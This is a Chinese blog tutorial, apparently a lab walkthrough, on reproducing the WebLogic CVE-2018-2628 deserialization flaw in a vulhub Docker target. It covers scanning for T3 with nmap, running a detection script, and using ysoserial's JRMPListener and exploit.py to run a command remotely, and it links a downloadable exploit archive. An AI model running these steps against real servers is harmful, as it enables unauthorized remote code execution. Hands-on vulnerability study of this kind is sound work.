目录

weblogic CVE-2018-2628反序列化漏洞
weblogic CVE-2018-2628反序列化漏洞

access_time
brush 1189个字
local_library 289
local_offer 反序列化
 CVE-2018-2628影响的软件版本为:
   Weblogic 10.3.6.0
   Weblogic 12.1.3.0
   Weblogic 12.2.1.2
   Weblogic 12.2.1.3

搭建vulhub靶场请参考这篇文章:https://blog.csdn.net/weixin_44023403/article/details/115262270

进入vulhub/weblogic/vulhub/weblogic/CVE-2018-2628

对靶场进行编译

docker-compose build

图片.png

运行靶场

docker-compose up -d

图片.png

下载CVE-2018-2628漏洞检测工具

git clone https://github.com/Lighird/CVE-2018-2628

图片.png

容改为ip:port,Ip为目标ip

图片.png

用nmap进行扫描,显示开启了T3协议

nmap -n -v -p7001,7002 127.0.0.1 -script=weblogic-t3-info

图片.png

输入命令python CVE-2018-2628-MultiThreading.py; 出现了is vul CVE-2018-2628 说明漏洞存在

图片.png

接下来,我们要对漏洞进行利用

攻击机可以是Linux系统,也可以是Windows系统,在这里使用Windows10本机作为攻击机,注意:Win10上需要有java环境和python环境(最好是python2,python3可能会运行报错)


1.在攻击机上使用ysoserial-cve-2018-2628工具,使用格式如下:

java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [攻击机监听端口] jdk版本编号 "要执行的命令"

注:jdk版本只要大于1.7,直接填Jdk7u21就可以了

图片.png

2.在攻击机上使用exploit.py,使用格式如下:

python exploit.py 靶机IP 端口(默认7001) ysoserial-0.1-cve-2018-2628-all.jar的位置 攻击机IP 攻击机监听端口 JRMPClient

图片.png

验证是否攻击成功

进入虚拟机环境,输入docker-compose exec weblogic bash,查看/tmp下是否生成了test文件

图片.png


图片.png

本文用到的exp

CVE-2018-2628.rar


#如无特别声明,该文章均为 原创,转载请遵循 署名-非商业性使用 4.0 国际(CC BY-NC 4.0) 协议,即转载请注明文章来源。
#最后编辑时间为: 2022-08-19 20:55:03



create 添加新评论

请先登陆后再发表评论